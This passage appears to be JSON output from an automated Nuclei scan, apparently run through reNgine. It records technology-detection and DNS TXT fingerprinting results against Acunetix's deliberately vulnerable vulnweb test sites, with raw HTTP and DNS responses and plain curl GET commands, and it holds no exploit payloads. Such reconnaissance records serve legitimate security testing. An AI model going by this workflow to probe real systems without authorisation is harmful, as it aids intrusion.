href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9070')\\\" style=\\\"color:Black\\\" title=\\\"October 31\\\"\\u003e31\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9071')\\\" style=\\\"color:Black\\\" title=\\\"November 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9072')\\\" style=\\\"color:Black\\\" title=\\\"November 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9073')\\\" style=\\\"color:Black\\\" title=\\\"November 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9074')\\\" style=\\\"color:Black\\\" title=\\\"November 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9075')\\\" style=\\\"color:Black\\\" title=\\\"November 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9076')\\\" style=\\\"color:Black\\\" title=\\\"November 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9077')\\\" style=\\\"color:Black\\\" title=\\\"November 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9078')\\\" style=\\\"color:Black\\\" title=\\\"November 08\\\"\\u003e8\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9079')\\\" style=\\\"color:Black\\\" title=\\\"November 09\\\"\\u003e9\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9080')\\\" style=\\\"color:Black\\\" title=\\\"November 10\\\"\\u003e10\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9081')\\\" style=\\\"color:Black\\\" title=\\\"November 11\\\"\\u003e11\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9082')\\\" style=\\\"color:Black\\\" title=\\\"November 12\\\"\\u003e12\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"border-color:#806640;width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9083')\\\" style=\\\"color:Black\\\" title=\\\"November 13\\\"\\u003e13\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:34:39.805509487Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6.6 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"font-awesome\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:40.133437525Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:52.0) Gecko/20100101 Firefox/52.0' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 25732\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 25732\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:40.208890224Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 7108\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 7108\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:40.212615156Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 6465\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 6465\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:40.21267427Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 49345\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 49345\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:40.21274218Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS 